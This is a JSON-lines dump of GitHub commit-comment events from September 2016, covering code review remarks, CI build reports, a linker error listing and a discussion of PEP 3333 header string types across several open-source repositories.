{"id":"4606458658","type":"CommitCommentEvent","actor":{"login":"sashahart"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19140563,"position":null,"line":null,"path":null,"commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-23T03:57:35Z","updated_at":"2016-09-23T03:57:35Z","body":"In advance of anyone actually digging into a more substantive code review here, I'm not sure what to make of the given rationale, or perhaps (and this wouldn't be the first time) I'm not sure what to make of PEP 3333. So I'd be interested to have the following refuted.\r\n\r\nThe commit message says among other things that\r\n\r\n> According to pep 3333 response headers are supposed to be bytestrings. In Python 2 that means a str, and in Python 3, bytes.\r\n\r\nThis may be a terminology thing, but under [`A Note On String Types`](https://www.python.org/dev/peps/pep-3333/#a-note-on-string-types) I see a contrast between \r\n\r\n> \"Native\" strings (which are always implemented using the type named str ) that are used for request/response headers\r\n\r\nand \r\n\r\n> \"Bytestrings\" (which are implemented using the bytes type in Python 3, and str elsewhere)\r\n\r\nI think this pretty clearly indicates that response headers are not bytestrings (per the PEP 3333 sense) but are just of whatever type is named `str` - that's a bytestring on python 2 (where `isinstance(b\"foo\", str)` is True) , but a human-readable/unicode character type on python 3 (where `isinstance(u\"foo\", str)` is True).\r\n\r\nIt is clarified that \r\n>  where you see the word \"string\" in this document, it refers to a \"native\" string, i.e., an object of type str , whether it is internally implemented as bytes or unicode.\r\n\r\nand also\r\n\r\n> Again, all objects referred to in this specification as \"strings\" must be of type str or StringType , and must not be of type unicode or UnicodeType \r\n\r\nso when I later read this,\r\n\r\n> Note also that strings passed to start_response() as a status or as response headers\r\n\r\nit again confirms that response headers are bytestrings on python2, but unicode on python3.\r\n\r\nMy personal opinion has long been that bytestrings are the appropriate type for data to be exchanged at system boundaries (e.g. file I/O and raw socket send/recv, filenames, environment variables, etc.)  regardless of whether someone believes they MAY have a textual interpretation - just because we can't necessarily rely on these things even to have any intelligible encoding, let alone to know the encoding so that we can safely decode. This creates weird situations like people having to smuggle raw bytes in unicode types.  But I didn't have any input on things like PEP 3333, so...\r\n\r\nI can also read mod_wsgi source as confirming this, e.g. note how painstakingly the following marks bytestrings (`output = b'Hello World!'` ... ` return [output]`), and then does not use them for response headers (`response_headers = [('Content-type', 'text/plain')` ... `start_response(status, response_headers)`): https://github.com/GrahamDumpleton/mod_wsgi/blob/e238c93ceff2694aec391194e23ab821c6f2cd8c/tests/hello.wsgi\r\n\r\nJust to refine that understanding,  the returned iterable DOES have to use bytestrings, and so by extension does the `write` callable returned by `start_response`, e.g.\r\n\r\n> If using write() function returned by start_response() under Python 3.X and a Unicode string is passed to it rather than a byte string, then a memory leak will occur because of errors in Python object reference counting. \r\n[(ref)](https://github.com/GrahamDumpleton/mod_wsgi/blob/e238c93ceff2694aec391194e23ab821c6f2cd8c/docs/release-notes/version-3.4.rst)"}},"created_at":"2016-09-23T03:57:35Z"}
{"id":"4606460235","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"sbcgua/abapGit"},"payload":{"comment":{"id":19140565,"position":null,"line":null,"path":null,"commit_id":"9ccff2690f6ad1c26f4d0e36510304991d238c3f","created_at":"2016-09-23T03:58:17Z","updated_at":"2016-09-23T03:58:17Z","body":"perhaps also output `gc_abap_version` ?"}},"created_at":"2016-09-23T03:58:17Z"}
{"id":"4606462142","type":"CommitCommentEvent","actor":{"login":"nagireddygit"},"repo":{"name":"nagireddygit/Dev"},"payload":{"comment":{"id":19140569,"position":null,"line":null,"path":null,"commit_id":"0e2fa407841e5e62cd73aac211f2f4dffa541ea1","created_at":"2016-09-23T03:59:08Z","updated_at":"2016-09-23T03:59:08Z","body":"Why did you create a file"}},"created_at":"2016-09-23T03:59:08Z"}
{"id":"4606462379","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/friendly-umbrella"},"payload":{"comment":{"id":19140570,"position":1,"line":1,"path":"README.md","commit_id":"0a4d2f389aa9e9687ac83f4c70051a5edf1703d3","created_at":"2016-09-23T03:59:15Z","updated_at":"2016-09-23T03:59:15Z","body":"{[<http://www.humbertoantonio.net>]}"}},"created_at":"2016-09-23T03:59:15Z"}
{"id":"4606464126","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/friendly-umbrella"},"payload":{"comment":{"id":19140574,"position":1,"line":1,"path":"README.md","commit_id":"0a4d2f389aa9e9687ac83f4c70051a5edf1703d3","created_at":"2016-09-23T04:00:00Z","updated_at":"2016-09-23T04:00:00Z","body":"The server at www.humbertoantonio.net can't be found, because the DNS lookup failed. DNS is the network service that translates a website's name to its Internet address. This error is most often caused by having no connection to the Internet or a misconfigured network. It can also be caused by an unresponsive DNS server or a firewall preventing Google Chrome from accessing the network."}},"created_at":"2016-09-23T04:00:00Z"}
{"id":"4606466613","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"RemieRichards/osu"},"payload":{"comment":{"id":19140581,"position":27,"line":27,"path":"osu.Game/Graphics/UserInterface/KeyCounter.cs","commit_id":"6e19577cfe9d08ebe5033708a00225162e2a471c","created_at":"2016-09-23T04:00:46Z","updated_at":"2016-09-23T04:00:46Z","body":"you shouldn't need this. Count should be an AutoSize itself, not its child."}},"created_at":"2016-09-23T04:00:46Z"}
{"id":"4606468459","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19140586,"position":null,"line":null,"path":null,"commit_id":"15855226fa3b50e64f879905daf16db476c8f45e","created_at":"2016-09-23T04:01:26Z","updated_at":"2016-09-23T04:01:26Z","body":"Also see [Issue 300](http://github.com/weidai11/cryptopp/issues/300)."}},"created_at":"2016-09-23T04:01:26Z"}
{"id":"4606469328","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19140588,"position":null,"line":null,"path":null,"commit_id":"9f1da102240c8070fd9fafce5c9416dab6260eb4","created_at":"2016-09-23T04:01:49Z","updated_at":"2016-09-23T04:01:49Z","body":"@Gillou68310 I have updated the project to Android Studio 2.2. It will probably not work correctly for you until you update from 2.1 to 2.2.\r\n\r\nWith this update comes **much** better C/C++ support with proper code indexing. Android Studio even supports CMake now if we want to transition to that, although that could be a little bit of a pain."}},"created_at":"2016-09-23T04:01:49Z"}
{"id":"4606470841","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/friendly-umbrella"},"payload":{"comment":{"id":19140592,"position":1,"line":1,"path":"README.md","commit_id":"0a4d2f389aa9e9687ac83f4c70051a5edf1703d3","created_at":"2016-09-23T04:02:21Z","updated_at":"2016-09-23T04:02:21Z","body":"DNS=ipv4/chrome/cname=www.aquasolaradvance.com/wix>\r\n\r\n?\r\n+no ip\r\n\r\n[A]licence"}},"created_at":"2016-09-23T04:02:21Z"}
{"id":"4606470990","type":"CommitCommentEvent","actor":{"login":"RemieRichards"},"repo":{"name":"RemieRichards/osu"},"payload":{"comment":{"id":19140593,"position":27,"line":27,"path":"osu.Game/Graphics/UserInterface/KeyCounter.cs","commit_id":"6e19577cfe9d08ebe5033708a00225162e2a471c","created_at":"2016-09-23T04:02:25Z","updated_at":"2016-09-23T04:02:25Z","body":"This is KeyCounter, not KeyboardCount (I'm not sure if it's you or I who's confused)"}},"created_at":"2016-09-23T04:02:25Z"}
{"id":"4606476689","type":"CommitCommentEvent","actor":{"login":"larryli"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19140606,"position":5,"line":75,"path":"framework/console/controllers/MigrateController.php","commit_id":"49aec24ae1f01d51b4f3cec8e44d44387022d06b","created_at":"2016-09-23T04:04:56Z","updated_at":"2016-09-23T04:04:56Z","body":"This change does not update the db migrations guide.\r\nsee http://www.yiiframework.com/doc-2.0/guide-db-migrations.html#customizing-migrations `generatorTemplateFiles`"}},"created_at":"2016-09-23T04:04:56Z"}
{"id":"4606479104","type":"CommitCommentEvent","actor":{"login":"xpspectre"},"repo":{"name":"kroneckerbio/kroneckerbio"},"payload":{"comment":{"id":19140610,"position":110,"line":110,"path":"Source/ExportModelAnalyticSBML2.m","commit_id":"42ea2555699e9431925744bca1c7f703a68233db","created_at":"2016-09-23T04:05:58Z","updated_at":"2016-09-23T04:05:58Z","body":"SBML ID can start with an underscore (check this) but Matlab identifier can't. Deleting the non [a-zA-Z0-9_] chars should be OK."}},"created_at":"2016-09-23T04:05:58Z"}
{"id":"4606479282","type":"CommitCommentEvent","actor":{"login":"ITC515"},"repo":{"name":"shivani-sharma19/Shivani_Kulbir"},"payload":{"comment":{"id":19140611,"position":null,"line":null,"path":null,"commit_id":"a8b0db857042732aa13d25c9a27d81d59dc4ab5f","created_at":"2016-09-23T04:06:04Z","updated_at":"2016-09-23T04:06:04Z","body":"committed"}},"created_at":"2016-09-23T04:06:04Z"}
{"id":"4606479485","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"RemieRichards/osu"},"payload":{"comment":{"id":19140612,"position":17,"line":17,"path":"osu.Game/Graphics/UserInterface/MouseCount.cs","commit_id":"6e19577cfe9d08ebe5033708a00225162e2a471c","created_at":"2016-09-23T04:06:09Z","updated_at":"2016-09-23T04:06:09Z","body":"OnMouseDown / OnMouseUp"}},"created_at":"2016-09-23T04:06:09Z"}
{"id":"4606482740","type":"CommitCommentEvent","actor":{"login":"vpn8082"},"repo":{"name":"apradillap/RubyMotionGoogleAnalyticsSDKiOSv3"},"payload":{"comment":{"id":19140619,"position":4,"line":19,"path":".gitignore","commit_id":"eba41cf6db6b182cd68a4a3df676e126701ce812","created_at":"2016-09-23T04:07:38Z","updated_at":"2016-09-23T04:07:38Z","body":".repl_history"}},"created_at":"2016-09-23T04:07:38Z"}
{"id":"4606483228","type":"CommitCommentEvent","actor":{"login":"vpn8082"},"repo":{"name":"apradillap/RubyMotionGoogleAnalyticsSDKiOSv3"},"payload":{"comment":{"id":19140621,"position":4,"line":19,"path":".gitignore","commit_id":"eba41cf6db6b182cd68a4a3df676e126701ce812","created_at":"2016-09-23T04:07:50Z","updated_at":"2016-09-23T04:07:50Z","body":".repl_history"}},"created_at":"2016-09-23T04:07:50Z"}
{"id":"4606483843","type":"CommitCommentEvent","actor":{"login":"sashahart"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19140623,"position":null,"line":null,"path":null,"commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-23T04:08:07Z","updated_at":"2016-09-23T04:08:07Z","body":"In any case I agree that some module shuffling is in order on seeing that `setup.py` imports `wsgi_intercept/__init__.py` in order to obtain values for `version` and `long_description` arguments to pass to `setup()`. In my ideal style preference `setup.py` doesn't import the module it's installing, `__init__.py` has at most a docstring in it, or both, just to avoid this kind of fiddliness like whatever six import issue you're having. But you can only do so much when documented public API is in `__init__.py` already, so I'd just avoid importing it from `setup.py`. "}},"created_at":"2016-09-23T04:08:07Z"}
{"id":"4606483903","type":"CommitCommentEvent","actor":{"login":"vpn8082"},"repo":{"name":"apradillap/RubyMotionGoogleAnalyticsSDKiOSv3"},"payload":{"comment":{"id":19140624,"position":7,"line":20,"path":".gitignore","commit_id":"eba41cf6db6b182cd68a4a3df676e126701ce812","created_at":"2016-09-23T04:08:08Z","updated_at":"2016-09-23T04:08:08Z","body":"google"}},"created_at":"2016-09-23T04:08:08Z"}
{"id":"4606485589","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140628,"position":62,"line":729,"path":"index.html","commit_id":"ab5cff29f566b35a79bc7a10f7423922f866c1ea","created_at":"2016-09-23T04:08:51Z","updated_at":"2016-09-23T04:08:51Z","body":"Bah I just couldn't figure it out earlier. Thanks :+1: "}},"created_at":"2016-09-23T04:08:51Z"}
{"id":"4606486733","type":"CommitCommentEvent","actor":{"login":"RedstormJones"},"repo":{"name":"RedstormJones/PHP-SecurityServicesScraper"},"payload":{"comment":{"id":19140629,"position":null,"line":null,"path":null,"commit_id":"03adbf959f83c8d60511c773102b488758144292","created_at":"2016-09-23T04:09:20Z","updated_at":"2016-09-23T04:09:20Z","body":"first set of StyleCI fixes"}},"created_at":"2016-09-23T04:09:20Z"}
{"id":"4606490411","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140635,"position":null,"line":null,"path":null,"commit_id":"3f69790a93776961734121b747d31b7a27d332ac","created_at":"2016-09-23T04:10:54Z","updated_at":"2016-09-23T04:10:54Z","body":"@kbenne we should have a phone call about this tomorrow"}},"created_at":"2016-09-23T04:10:54Z"}
{"id":"4606491938","type":"CommitCommentEvent","actor":{"login":"hkommineni"},"repo":{"name":"hkommineni/Crypto3"},"payload":{"comment":{"id":19140637,"position":null,"line":null,"path":null,"commit_id":"95817cf273ea7a52554ad4d4ce7a40399ab922d6","created_at":"2016-09-23T04:11:34Z","updated_at":"2016-09-23T04:11:34Z","body":"Sometimes ECB mode my go undetected. Why do you think this may happen?\r\nThis may happen because not always ciphertext has identical blocks after decryption. This may lead to not detect ECB mode.\r\n"}},"created_at":"2016-09-23T04:11:34Z"}
{"id":"4606495228","type":"CommitCommentEvent","actor":{"login":"HipsterZipster"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":19140647,"position":null,"line":null,"path":null,"commit_id":"92a62997adb3c8512328d5a0ae42fe5d156291f1","created_at":"2016-09-23T04:13:09Z","updated_at":"2016-09-23T04:13:09Z","body":"Thanks! Just tried it out using Alex's instructions http://stackoverflow.com/a/39591319/57089 and it worked perfectly for `cordova run ios --device --buildConfig=build.json`"}},"created_at":"2016-09-23T04:13:09Z"}
{"id":"4606497574","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140655,"position":null,"line":null,"path":null,"commit_id":"3f69790a93776961734121b747d31b7a27d332ac","created_at":"2016-09-23T04:14:13Z","updated_at":"2016-09-23T04:14:13Z","body":"os_2_0_fix_static_build (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3f69790a93776961734121b747d31b7a27d332ac-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3f69790a93776961734121b747d31b7a27d332ac-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T04:14:13Z"}
{"id":"4606500447","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19140661,"position":null,"line":null,"path":null,"commit_id":"f67a48a39ba93f57597f6c7cc021e78460091200","created_at":"2016-09-23T04:15:34Z","updated_at":"2016-09-23T04:15:34Z","body":"@nyalldawson , ah, I was victim of that quite a few times, thanks.\r\n\r\nAlso, what IMHO would help here is for the effect settings panel to switch to an effect that's just been activated via its checkbox. I've had countless \"args\" when realizing that I was changing the settings of a different effect when activating [x] drop shadow checkbox."}},"created_at":"2016-09-23T04:15:34Z"}
{"id":"4606502252","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19140665,"position":null,"line":null,"path":null,"commit_id":"9f1da102240c8070fd9fafce5c9416dab6260eb4","created_at":"2016-09-23T04:16:25Z","updated_at":"2016-09-23T04:16:25Z","body":"It also now has a much improved GPU debugger. One can now see current GPU state as well as see all executed OpenGL command."}},"created_at":"2016-09-23T04:16:25Z"}
{"id":"4606507056","type":"CommitCommentEvent","actor":{"login":"noahhkim"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":19140671,"position":null,"line":null,"path":null,"commit_id":"7d0e356e7ab4d37ecb9e514ed45731367215078e","created_at":"2016-09-23T04:18:28Z","updated_at":"2016-09-23T04:18:28Z","body":"It looks like the TODO item was already done for us"}},"created_at":"2016-09-23T04:18:28Z"}
{"id":"4606508717","type":"CommitCommentEvent","actor":{"login":"Shoestrong"},"repo":{"name":"Shoestrong/websocket"},"payload":{"comment":{"id":19140675,"position":null,"line":null,"path":null,"commit_id":"5b7383edc48d70aa859bde9546d82d3d35b30d23","created_at":"2016-09-23T04:19:14Z","updated_at":"2016-09-23T04:19:14Z","body":"*.js linguist-language=JavaScript\r\n*.css linguist-language=JavaScript\r\n*.html linguist-language=JavaScript"}},"created_at":"2016-09-23T04:19:14Z"}
{"id":"4606512326","type":"CommitCommentEvent","actor":{"login":"Shoestrong"},"repo":{"name":"Shoestrong/websocket"},"payload":{"comment":{"id":19140683,"position":3,"line":3,"path":".gitattributes","commit_id":"5b7383edc48d70aa859bde9546d82d3d35b30d23","created_at":"2016-09-23T04:20:56Z","updated_at":"2016-09-23T04:20:56Z","body":"*.js linguist-language=JavaScript\r\n*.css linguist-language=JavaScript\r\n*.html linguist-language=JavaScript"}},"created_at":"2016-09-23T04:20:56Z"}
{"id":"4606513196","type":"CommitCommentEvent","actor":{"login":"robot-rover"},"repo":{"name":"DV8FromTheWorld/JDA-Player"},"payload":{"comment":{"id":19140688,"position":null,"line":null,"path":null,"commit_id":"e27496cd74cc25a6f3d90e84a3eab77208502a5b","created_at":"2016-09-23T04:21:22Z","updated_at":"2016-09-23T04:21:22Z","body":"so what does this do exactly?"}},"created_at":"2016-09-23T04:21:22Z"}
{"id":"4606514723","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140696,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-23T04:22:04Z","updated_at":"2016-09-23T04:22:04Z","body":"MoreDayliteFollowup (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2335 of 2342 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 7 tests had: Table big diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T04:22:04Z"}
{"id":"4606515676","type":"CommitCommentEvent","actor":{"login":"RemieRichards"},"repo":{"name":"RemieRichards/osu"},"payload":{"comment":{"id":19140698,"position":27,"line":27,"path":"osu.Game/Graphics/UserInterface/KeyCounter.cs","commit_id":"6e19577cfe9d08ebe5033708a00225162e2a471c","created_at":"2016-09-23T04:22:27Z","updated_at":"2016-09-23T04:22:27Z","body":"Ok yep you were correct I'm a moron."}},"created_at":"2016-09-23T04:22:27Z"}
{"id":"4606517694","type":"CommitCommentEvent","actor":{"login":"kaylaqian"},"repo":{"name":"blesssecret/testProject"},"payload":{"comment":{"id":19140699,"position":null,"line":null,"path":null,"commit_id":"c60c4fefd2eedda67faae9364c0cb19c6f0815ae","created_at":"2016-09-23T04:23:15Z","updated_at":"2016-09-23T04:23:15Z","body":"hello hello"}},"created_at":"2016-09-23T04:23:15Z"}
{"id":"4606517952","type":"CommitCommentEvent","actor":{"login":"JerrodV"},"repo":{"name":"JerrodV/WpfStartup"},"payload":{"comment":{"id":19140700,"position":463,"line":307,"path":"WpfStartup/Helpers/Database.cs","commit_id":"7f763191e3656d4ae390f47fcef51816bad8b49a","created_at":"2016-09-23T04:23:20Z","updated_at":"2016-09-23T04:23:20Z","body":"I think I should call dispose on this also. Not sure if it is appropriate though."}},"created_at":"2016-09-23T04:23:20Z"}
{"id":"4606521524","type":"CommitCommentEvent","actor":{"login":"JerrodV"},"repo":{"name":"JerrodV/WpfStartup"},"payload":{"comment":{"id":19140706,"position":507,"line":348,"path":"WpfStartup/Helpers/Database.cs","commit_id":"7f763191e3656d4ae390f47fcef51816bad8b49a","created_at":"2016-09-23T04:25:03Z","updated_at":"2016-09-23T04:25:03Z","body":"There might be better ways to make sure the connection is i the expected state."}},"created_at":"2016-09-23T04:25:03Z"}
{"id":"4606528279","type":"CommitCommentEvent","actor":{"login":"parvezpatel30"},"repo":{"name":"parvezpatel30/Itinerary-Planner"},"payload":{"comment":{"id":19140718,"position":null,"line":null,"path":null,"commit_id":"1d4f0278c0e85708590edd0465096c0491c2bb12","created_at":"2016-09-23T04:28:23Z","updated_at":"2016-09-23T04:28:23Z","body":"Removing the unnecessary ejs dependency I meant."}},"created_at":"2016-09-23T04:28:23Z"}
{"id":"4606534450","type":"CommitCommentEvent","actor":{"login":"ruscoe"},"repo":{"name":"a-fro/mailchimp"},"payload":{"comment":{"id":19140723,"position":13,"line":80,"path":"includes/mailchimp.admin.inc","commit_id":"1c15ac1c26d093dab20e8703b0a59ebabbaf5c7a","created_at":"2016-09-23T04:31:10Z","updated_at":"2016-09-23T04:31:10Z","body":"`$accounts` isn't used in this function and could be removed."}},"created_at":"2016-09-23T04:31:10Z"}
{"id":"4606535410","type":"CommitCommentEvent","actor":{"login":"ToshihikoMakita"},"repo":{"name":"AntennaHouse/pdf5-ml"},"payload":{"comment":{"id":19140725,"position":null,"line":null,"path":null,"commit_id":"d4d94a9fc709d8cd11edde23361817497e1b95d2","created_at":"2016-09-23T04:31:39Z","updated_at":"2016-09-23T04:31:39Z","body":"DITA sepc implies ... ⇒ DITA spec implies ..."}},"created_at":"2016-09-23T04:31:39Z"}
{"id":"4606536559","type":"CommitCommentEvent","actor":{"login":"JerrodV"},"repo":{"name":"JerrodV/WpfStartup"},"payload":{"comment":{"id":19140727,"position":707,"line":542,"path":"WpfStartup/Helpers/Database.cs","commit_id":"7f763191e3656d4ae390f47fcef51816bad8b49a","created_at":"2016-09-23T04:32:11Z","updated_at":"2016-09-23T04:32:11Z","body":"Comment not complete"}},"created_at":"2016-09-23T04:32:11Z"}
{"id":"4606536658","type":"CommitCommentEvent","actor":{"login":"spanche"},"repo":{"name":"spanche/Actividad-2"},"payload":{"comment":{"id":19140728,"position":null,"line":null,"path":null,"commit_id":"680260c8ccbb4f39e3c218abe3d01ed6657425e8","created_at":"2016-09-23T04:32:14Z","updated_at":"2016-09-23T04:32:14Z","body":"Ajuste"}},"created_at":"2016-09-23T04:32:14Z"}
{"id":"4606538614","type":"CommitCommentEvent","actor":{"login":"DV8FromTheWorld"},"repo":{"name":"DV8FromTheWorld/JDA-Player"},"payload":{"comment":{"id":19140730,"position":null,"line":null,"path":null,"commit_id":"e27496cd74cc25a6f3d90e84a3eab77208502a5b","created_at":"2016-09-23T04:33:10Z","updated_at":"2016-09-23T04:33:10Z","body":"the `-4` flag forces youtube-dl to use only IPv4 when accessing the internet. This is important on some webhosts like OVH who are blocked by Youtube on IPv6 for some reason."}},"created_at":"2016-09-23T04:33:10Z"}
{"id":"4606538761","type":"CommitCommentEvent","actor":{"login":"chick"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19140731,"position":null,"line":null,"path":null,"commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-23T04:33:13Z","updated_at":"2016-09-23T04:33:13Z","body":"Yes, @donggyukim is correct"}},"created_at":"2016-09-23T04:33:13Z"}
{"id":"4606542439","type":"CommitCommentEvent","actor":{"login":"robot-rover"},"repo":{"name":"DV8FromTheWorld/JDA-Player"},"payload":{"comment":{"id":19140758,"position":null,"line":null,"path":null,"commit_id":"e27496cd74cc25a6f3d90e84a3eab77208502a5b","created_at":"2016-09-23T04:35:02Z","updated_at":"2016-09-23T04:35:02Z","body":"Thanks 👌"}},"created_at":"2016-09-23T04:35:02Z"}
{"id":"4606546121","type":"CommitCommentEvent","actor":{"login":"sandeepansengupta"},"repo":{"name":"sandeepansengupta/Embedded"},"payload":{"comment":{"id":19140767,"position":5,"line":87,"path":"Luminode/FirmWare/Source/Arduino/Luminode_v1.2.3.ino","commit_id":"3ea1c2e87c245d89f6e12106e70b3a4622ccc3fa","created_at":"2016-09-23T04:36:45Z","updated_at":"2016-09-23T04:36:45Z","body":"strlen(tmp) consumes less space and works but I've no idea how or why.\r\n"}},"created_at":"2016-09-23T04:36:45Z"}
{"id":"4606548737","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140772,"position":null,"line":null,"path":null,"commit_id":"b210c6dc36d21347152bbe798db8b1170aac3f8b","created_at":"2016-09-23T04:38:01Z","updated_at":"2016-09-23T04:38:01Z","body":"Here are the duplicate symbols:\r\n\r\n```\r\nError\t8\terror LNK2005: CSharp_maximum__SWIG_0 already defined in csharp_OpenStudioUtilitiesData_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioISOModel_wrap.obj\r\nError\t9\terror LNK2005: CSharp_maximum__SWIG_1 already defined in csharp_OpenStudioUtilitiesData_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioISOModel_wrap.obj\r\nError\t10\terror LNK2005: CSharp_minimum__SWIG_0 already defined in csharp_OpenStudioUtilitiesData_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioISOModel_wrap.obj\r\nError\t11\terror LNK2005: CSharp_minimum__SWIG_1 already defined in csharp_OpenStudioUtilitiesData_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioISOModel_wrap.obj\r\nError\t12\terror LNK2005: CSharp_sum__SWIG_0 already defined in csharp_OpenStudioUtilitiesData_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioISOModel_wrap.obj\r\nError\t13\terror LNK2005: CSharp_sum__SWIG_1 already defined in csharp_OpenStudioUtilitiesData_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioISOModel_wrap.obj\r\nError\t14\terror LNK2005: CSharp_LeftShift__SWIG_0 already defined in csharp_OpenStudioUtilitiesCore_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioMeasure_wrap.obj\r\nError\t15\terror LNK2005: CSharp_LeftShift__SWIG_1 already defined in csharp_OpenStudioUtilitiesCore_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioMeasure_wrap.obj\r\nError\t7\terror LNK2005: CSharp_LeftShift already defined in csharp_OpenStudioUtilitiesCore_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioModelGeometry_wrap.obj\r\nError\t2\terror LNK2005: CSharp_LeftShift__SWIG_10 already defined in csharp_OpenStudioUtilitiesIdf_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioUtilitiesData_wrap.obj\r\nError\t3\terror LNK2005: CSharp_LeftShift__SWIG_11 already defined in csharp_OpenStudioUtilitiesIdf_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioUtilitiesData_wrap.obj\r\nError\t4\terror LNK2005: CSharp_LeftShift__SWIG_7 already defined in csharp_OpenStudioUtilitiesIdd_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioUtilitiesTime_wrap.obj\r\nError\t5\terror LNK2005: CSharp_LeftShift__SWIG_5 already defined in csharp_OpenStudioUtilitiesTime_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioUtilitiesUnits_wrap.obj\r\nError\t6\terror LNK2005: CSharp_LeftShift__SWIG_6 already defined in csharp_OpenStudioUtilitiesTime_wrap.obj\tE:\\openstudio-2-0e\\core-build\\csharp\\csharp_OpenStudioUtilitiesUnits_wrap.obj\r\nError\t16\terror LNK1169: one or more multiply defined symbols found\tE:\\openstudio-2-0e\\core-build\\Products\\Release\\openstudio_csharp.dll\t1\r\n```\r\n"}},"created_at":"2016-09-23T04:38:01Z"}
{"id":"4606549475","type":"CommitCommentEvent","actor":{"login":"yash1997"},"repo":{"name":"HariomJa2/hello-world"},"payload":{"comment":{"id":19140773,"position":null,"line":null,"path":null,"commit_id":"6df96b2a9061450162914f5d7d386defb245708d","created_at":"2016-09-23T04:38:23Z","updated_at":"2016-09-23T04:38:23Z","body":"don bosco!"}},"created_at":"2016-09-23T04:38:23Z"}
{"id":"4606550289","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140778,"position":null,"line":null,"path":null,"commit_id":"b210c6dc36d21347152bbe798db8b1170aac3f8b","created_at":"2016-09-23T04:38:46Z","updated_at":"2016-09-23T04:38:46Z","body":"os_2_0_fix_static_build (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b210c6dc36d21347152bbe798db8b1170aac3f8b-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b210c6dc36d21347152bbe798db8b1170aac3f8b-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T04:38:46Z"}
